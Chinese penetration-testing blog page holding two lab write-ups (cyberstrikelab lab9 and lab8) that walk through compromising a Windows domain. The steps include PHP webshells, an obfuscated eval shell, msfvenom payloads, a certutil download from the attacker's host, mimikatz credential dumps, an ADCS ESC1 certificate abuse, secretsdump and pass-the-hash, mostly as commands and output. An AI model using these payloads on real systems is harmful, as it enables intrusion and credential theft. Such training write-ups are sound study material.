首页
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,397 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,053 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,167 阅读
4
几个常见的密码字典推荐
3,189 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,159 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
Windows渗透
域渗透
HackMyVm
CyberStrikeLab靶场
内网渗透
渗透测试
Web安全
网络安全
cyberstrikelab
OSCP
SQL注入
WAF绕过
信息收集
渗透工具
靶场
靶场推荐
MSF
ThinkPHP漏洞
Vulfocus
vulnhub
白小羽
累计撰写
184
篇文章
累计收到
0
条评论
首页
导航
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
搜索到
184
篇与
的结果
2025-12-13
【域渗透】cyberstrikelab-lab9
cyberstrikelab-lab9第一台web 172.5.33.6sql的payloadhttp://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 a66abb5684c45962d887564f08346e8d 解密 admin123456从robots.txt中发现admin地址,登录管理员账号在这里发现了html模板中包含了php代码在模板管理中修改index.html<?php @eval($_POST['a']);?> 一句话还是连不上的,尝试另一种马,好像也没有其他方法能打进去了,网上找了十多种写法的马,就这种有效<?php function simpleTransform($str, $offset = 1) { $transformed = ''; for ($i = 0; $i < strlen($str); $i++) { $transformed .= chr((ord($str[$i]) + $offset) % 256); } return $transformed; } $original = $_REQUEST["a"]; $transformed = simpleTransform($original, 3); function reverseTransform($str, $offset = 1) { $reversed = ''; for ($i = 0; $i < strlen($str); $i++) { $reversed .= chr((ord($str[$i]) - $offset + 256) % 256); } return $reversed; } $reversed = reverseTransform($transformed, 3); echo eval($reversed); 蚁剑连接生马msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 上线msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z" 提权,上传fscanmeterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > getsystem ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 查ip,扫内网C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11 IPv4 Address. . . . . . . . . . . : 172.5.33.6 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.5.33.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2 IPv4 Address. . . . . . . . . . . : 10.6.6.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.6.6.1 Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24 fscan.exe -h 10.6.6.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.10 is alive (icmp) Target 10.6.6.55 is alive (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 3 10.6.6.55:88 open 10.6.6.10:3306 open 10.6.6.88:445 open 10.6.6.55:445 open 10.6.6.10:445 open 10.6.6.88:139 open 10.6.6.55:139 open 10.6.6.10:139 open 10.6.6.88:135 open 10.6.6.55:135 open 10.6.6.10:135 open 10.6.6.55:80 open 10.6.6.10:80 open [*] alive ports len is: 13 start vulscan [+] NetInfo: [*]10.6.6.10 [->]WIN-784BAKDI0AC [->]172.5.33.6 [->]10.6.6.10 [+] NetInfo: [*]10.6.6.55 [->]DC [->]10.6.6.55 [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] WebTitle:http://10.6.6.10 code:200 len:0 title:None [*] 10.6.6.55 [+]DC __MSBROWSE__\DC Windows Server 2016 Standard 14393 [*] 10.6.6.88 cyberstrikelab\CYBERWEB Windows Server 2016 Standard 14393 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] 10.6.6.55 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.55 code:200 len:703 title:IIS Windows Server [+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 已完成 13/13 [*] 扫描结束,耗时: 1m8.3819491s 其中10.6.6.55被识别为域控制器10.6.6.88是域成员,主机名cyberweb,属于域cyberstrikelab10.6.6.55: 报告了一个漏洞 poc-yaml-active-directory-certsrv-detect。这强烈暗示该服务器上运行着 Active Directory 证书服务 (AD CS),是后续攻击的关键入口。设置路由,配置代理meterpreter > run post/multi/manage/autoroute [*] Running module against WIN-784BAKDI0AC (172.5.33.6) [*] Searching for subnets to autoroute. [+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table. [+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table. meterpreter > bg [*] Backgrounding session 2... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf auxiliary(server/socks_proxy) > set SRVPORT 1080 SRVPORT => 1080 msf auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server 配置系统代理配置文件proxychains4.conf┌──(root㉿kali)-[/data/windows_atk/domain_atk] └─# tail -n \6 /etc/proxychains4.conf [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 第二台fscan定向扫描,端口,发现3389能进行爆破,administrator密码为qwe123!@#C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000 fscan.exe -h 10.6.6.88 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 1 10.6.6.88:445 open 10.6.6.88:139 open 10.6.6.88:135 open 10.6.6.88:3389 open 10.6.6.88:5985 open [*] alive ports len is: 5 start vulscan [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.88:5985 code:404 len:315 title:Not Found [*] 10.6.6.88 cyberstrikelab\CYBERWEB Windows Server 2016 Standard 14393 已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied 已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied 已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied [+] RDP:10.6.6.88:3389:administrator qwe123!@# 已完成 5/5 [*] 扫描结束,耗时: 4m8.7461024s 在桌面找到第二个flag第三台看样子需要利用域控相关的漏洞了,永恒之蓝失败use exploit/multi/handler set rhost 10.6.6.88 run 共享data目录(便于传输文件),然后将正向马传上去,并执行proxychains rdesktop 10.6.6.88 -r disk:shell=/data 提权meterpreter > getuid Server username: CYBERWEB\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 抓取域内hashC:\Users\Administrator\Desktop>mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords User Name : CYBERWEB$ Domain : cyberstrikelab NTLM : 5e0d5d7bacf2087dfd44ea47812b5165 User Name : CYBERWEB$ Domain : cyberstrikelab NTLM : 331dcbb88d1a4847c97eab7c1c168ac8 User Name : Administrator Domain : CYBERWEB NTLM : c377ba8a4dd52401bc404dbe49771bbc 在这个3.bat文件中发现了一个账号密码,cslab / cs1ab@wwe第三台:ADCSADCS是横向移动到域控制器的常见路径3.1 侦察ADCS服务之前fscan扫出来的[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 表明可能存在AD证书服务再次上线getsystem,获取一个系统权限的cmd,获取一下CA名字(需要提权到system),执行 certutil名称为 cyberstrikelab-DC-CA获取到CA名称后,我们需要确定攻击入口,并且寻找可利用的漏洞,比如ESC1漏洞┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:636 ... OK [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Finding issuance policies [*] Found 15 issuance policies [*] Found 0 OIDs linked to templates [!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:445 <--socket error or timeout! [-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused [-] Use -debug to print a stacktrace [!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request' [!] Use -debug to print a stacktrace [!] Could not retrieve configuration for 'cyberstrikelab-DC-CA' [*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com' [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:80 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:443 ... OK [*] Enumeration output: Certificate Authorities 0 CA Name : cyberstrikelab-DC-CA DNS Name : DC.cyberstrikelab.com Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B Certificate Validity Start : 2025-04-22 07:45:38+00:00 Certificate Validity End : 2030-04-22 07:55:38+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Unknown Request Disposition : Unknown Enforce Encryption for Requests : Unknown Active Policy : Unknown Disabled Extensions : Unknown Certificate Templates 0 Template Name : DC Display Name : DC Certificate Authorities : cyberstrikelab-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2025-04-22T07:58:11+00:00 Template Last Modified : 2025-04-22T07:58:11+00:00 Permissions Enrollment Permissions Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins CYBERSTRIKELAB.COM\Authenticated Users Object Control Permissions Owner : CYBERSTRIKELAB.COM\Administrator Full Control Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Property Enroll : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins [+] User Enrollable Principals : CYBERSTRIKELAB.COM\Authenticated Users CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Domain Users [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. 参数来源/原因作用proxychains之前建立的代理配置让命令流量通过跳板机(10.6.6.10)进入内网certipy-ad工具选择专门用于AD证书服务攻击的工具find子命令查找证书模板和证书颁发机构(CA)-u 'cslab@10.6.6.55'从mimikatz获得使用域用户cslab,@后可以是IP或域名-password 'cs1ab@wwe'从mimikatz/3.bat获得cslab用户的密码-dc-ip 10.6.6.55fscan扫描结果指定域控制器的IP地址-vulnerable攻击目标只显示存在已知漏洞的证书模板-stdout输出选项将结果输出到终端从结果中看出,存在ESC1漏洞Template Name: DC Enabled: True Client Authentication: True Enrollee Supplies Subject: True # ESC1漏洞关键点 Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users # cslab可申请 Vulnerabilities: ESC1 3.2 利用ESC1漏洞3.2.1 创建机器账户(临时)利用cslab这个域用户在目标域中创建一个新的机器账户,结果会返回一个临时用户tmpuser$和密码信息proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com 参数来源/原因作用account create子命令在域中创建新的机器账户-user tmpuser自定义创建名为tmpuser$的机器账户-dns DC.cyberstrikelab.com从fscan结果获得设置机器账户的DNS主机名为什么要创建?Machine模板限制:有些证书模板(如Machine)只允许机器账户申请 隐蔽性:避免直接使用cslab账户进行敏感操作 权限要求:机器账户可以申请更广泛的证书类型 3.2.2 以机器账户请求证书通过新创建的机器账户 tmpuser$ 向目标域控制器(10.6.6.55)的证书颁发机构(CA)申请一个 机器证书(要多运行几次,运行一次可能成功不了)proxychains certipy-ad req \ -u 'tmpuser$@cyberstrikelab.com' \ -p 'kQb8YIJOWcKq69w5' \ -ca 'cyberstrikelab-DC-CA' \ -target 10.6.6.55 \ -template 'Machine' \ -dc-ip 10.6.6.55 参数来源/原因作用req子命令请求证书-u 'tmpuser$@...'上一步创建使用新创建的机器账户-p 'kQb8YIJOWcKq69w5'上一步输出机器账户的密码-ca 'cyberstrikelab-DC-CA'certipy find结果证书颁发机构的名称-target 10.6.6.55fscan扫描结果CA服务器的IP地址-template 'Machine'侦察发现利用存在漏洞的模板用dc.pfx 证书文件向域控制器 (10.6.6.55) 进行身份认证,却报了Kerberos时钟偏差,攻击机和域控时间是不能相差5分钟以上的┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [-] Use -debug to print a stacktrace [-] See the wiki for more information 3.2.3 修复Kerberos时间偏差查询域控时间proxychains net time -S 10.6.6.55 3.2.4 使用证书进行身份验证修改时间参数,这样就能执行成功了┌──(root㉿kali)-[/data/demo] └─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations [+] Nameserver: '10.6.6.55' [+] DC IP: '10.6.6.55' [+] DC Host: '' [+] Target IP: '10.6.6.55' [+] Remote Name: '10.6.6.55' [+] Domain: '' [+] Username: '' [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got TGT [*] Saving credential cache to 'dc.ccache' [+] Attempting to write data to 'dc.ccache' [+] Data written to 'dc.ccache' [*] Wrote credential cache to 'dc.ccache' [*] Trying to retrieve NT hash for 'dc$' [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa 参数来源/原因作用auth子命令使用证书进行Kerberos认证-pfx dc.pfx上一步生成包含私钥的证书文件-debug调试选项显示详细过程信息认证过程:证书提交:向域控(10.6.6.55)提交dc.pfx证书身份验证:证书证明申请者是DC$(域控制器机器账户)TGT获取:成功获取DC$的Kerberos票证授予票证(TGT)哈希提取:从TGT中提取DC$的NTLM哈希3.2.5 获取NTLM哈希用域控的机器账号 dc$ 的 NT 哈希,进行 Pass-the-Hash 身份验证,尝试从域控中提取所有域用户的凭据信息(如 NTLM 哈希等)。┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:445 ... OK [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:49669 ... OK Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa::: CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2::: tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c Administrator:des-cbc-md5:208fc8f42fae3132 krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337 krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb krbtgt:des-cbc-md5:23dc674a76bf7adc cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048 cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00 cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08 DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883 DC$:des-cbc-md5:a75801e31943a2dc CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9 CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a CYBERWEB$:des-cbc-md5:6d5dd3261f38c862 tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081 tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144 tmpuser$:des-cbc-md5:795d80ec58cdd5a8 [*] Cleaning up... 参数来源/原因作用impacket-secretsdump工具选择远程提取密码哈希的工具cyberstrikelab.com/dc\$@10.6.6.55目标指定使用dc$账户连接域控-hashes ...上一步获得提供dc$的LM和NTLM哈希dc\$中的\Shell转义防止$被Shell解释为变量3.2.6 PTHPTH,拿下域控,在根目录获取最后的flag┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55
2025年12月13日
620 阅读
0 评论
0 点赞
2025-12-13
【域渗透】cyberstrikelab-lab8
cyberstrikelab-lab8ZZZCMS目录扫描到后台地址admin弱口令 admin / admin123456发现版本信息 V1.6.1 zzzcms漏洞利用方法https://xz.aliyun.com/news/4103修改内容为{if:assert($_request[phpinfo()])}phpinfo();{end if} 访问你修改的这个页面http://172.50.12.33/search/ 一句话连接不上,那就执行系统命令,找到flag1{if:assert($_request[system($_POST[a])])};{end if} 本机开启http服务生成木马msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 从本机下载木马certutil -urlcache -split -f http://172.16.233.2:8000/shell.exe shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 172.50.12.33; set LPORT 4444; exploit -j -z" 执行木马,上线getsystem提权meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > getsystem ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 上传fscanupload /data/windows_atk/scan_info/fscan.exe 却没有发现另外一台主机C:\phpstudy_pro\WWW\search>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::b476:ff8c:347:ef73%5 IPv4 Address. . . . . . . . . . . : 172.50.12.33 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.50.12.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::47e:778d:c27:a958%4 IPv4 Address. . . . . . . . . . . : 10.5.5.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.5.5.1 Tunnel adapter Reusable ISATAP Interface {539A3334-B0ED-49F4-B694-5F6E0A7AB805}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{4A835BE8-816A-4266-AF10-0ADC1C46A06E}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.2/24 fscan.exe -h 10.5.5.2/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.5.5.2 is alive [*] Icmp alive hosts len is: 1 10.5.5.2:3306 open 10.5.5.2:445 open 10.5.5.2:139 open 10.5.5.2:135 open 10.5.5.2:80 open [*] alive ports len is: 5 start vulscan [+] NetInfo: [*]10.5.5.2 [->]WIN-NQOLAOUO8C1 [->]172.50.12.33 [->]10.5.5.2 [*] WebTitle:http://10.5.5.2 code:200 len:20013 title:cyberstrikelabzzzcms 已完成 5/5 [*] 扫描结束,耗时: 18.4658195s 使用命令扫C:\phpstudy_pro\WWW\search>for /l %i in (1,1,255) do @ping 10.5.5.%i -w 1 -n 1 | find /i "ttl" for /l %i in (1,1,255) do @ping 10.5.5.%i -w 1 -n 1 | find /i "ttl" Reply from 10.5.5.2: bytes=32 time<1ms TTL=128 Reply from 10.5.5.33: bytes=32 time=1ms TTL=128 Reply from 10.5.5.66: bytes=32 time=1ms TTL=128 主机33和66存活的,再扫,没有任何内容C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.33 -p 1-65000 fscan.exe -h 10.5.5.33 -p 1-65000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan [*] alive ports len is: 0 start vulscan 已完成 0/0 [*] 扫描结束,耗时: 7.1787098s 设置路由run post/multi/manage/autoroute 使用下面的这些msf模块扫端口都不行scanner/portscan/tcp scanner/portscan/syn 添加一个用户看看什么情况# 创建新用户,并设置密码: net user xiaoyu 123@abc /add # 将新用户添加到管理员组: net localgroup Administrators xiaoyu /add # 关闭Windows防火墙 netsh advfirewall set allprofiles state off # 修改注册表,强制启用远程桌面服务(RDP),允许通过远程桌面(3389端口)连接 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 把360退了,使用远程连接后的cmd扫这样能扫出来,那会不会是系统用户的问题,我提权了,重新反弹shellmsf exploit(multi/handler) > run [*] Started bind TCP handler agAInst 172.50.12.33:4444 [*] Sending stage (177734 bytes) to 172.50.12.33 [*] Meterpreter session 2 opened (10.10.10.173:35111 -> 172.50.12.33:4444) at 2025-12-11 04:32:10 -0500 meterpreter > shell Process 10896 created. Channel 1 created. Microsoft Windows [�汾 10.0.14393] (c) 2016 Microsoft Corporation����������Ȩ���� C:\phpstudy_pro\WWW\search>chcp 65001 chcp 65001 Active code page: 65001 C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.2/24 fscan.exe -h 10.5.5.2/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan (icmp) Target 10.5.5.2 is alive (icmp) Target 10.5.5.33 is alive (icmp) Target 10.5.5.66 is alive [*] Icmp alive hosts len is: 3 10.5.5.66:88 open 10.5.5.2:3306 open 10.5.5.66:445 open 10.5.5.33:445 open 10.5.5.2:445 open 10.5.5.66:139 open 10.5.5.33:139 open 10.5.5.2:139 open 10.5.5.33:135 open 10.5.5.2:135 open 10.5.5.2:80 open 10.5.5.66:135 open [*] alive ports len is: 12 start vulscan [*] NetInfo [*]10.5.5.2 [->]WIN-NQOLAOUO8C1 [->]172.50.12.33 [->]10.5.5.2 [*] NetInfo [*]10.5.5.33 [->]cyberweb [->]10.5.5.33 [*] NetInfo [*]10.5.5.66 [->]DC [->]10.5.5.66 [*] WebTitle http://10.5.5.2 code:200 len:20013 title:cyberstrikelabzzzcms [*] OsInfo 10.5.5.66 (Windows Server 2012 R2 Standard 9600) [*] OsInfo 10.5.5.33 (Windows Server 2016 Standard 14393) [*] NetBios 10.5.5.33 cyberweb.cyberstrikelab.com Windows Server 2016 Standard 14393 已完成 12/12 [*] 扫描结束,耗时: 8.5703463s 看来就是这个问题,重新设置路由run post/multi/manage/autoroute 设置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j fscan.exe -h 10.5.5.33 -p 1-10000C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.33 -p 1-10000 fscan.exe -h 10.5.5.33 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 10.5.5.33:445 open 10.5.5.33:139 open 10.5.5.33:135 open 10.5.5.33:3389 open 10.5.5.33:5985 open [*] alive ports len is: 5 start vulscan [*] NetInfo [*]10.5.5.33 [->]cyberweb [->]10.5.5.33 [*] NetBios 10.5.5.33 cyberweb.cyberstrikelab.com Windows Server 2016 Standard 14393 [*] OsInfo 10.5.5.33 (Windows Server 2016 Standard 14393) [*] 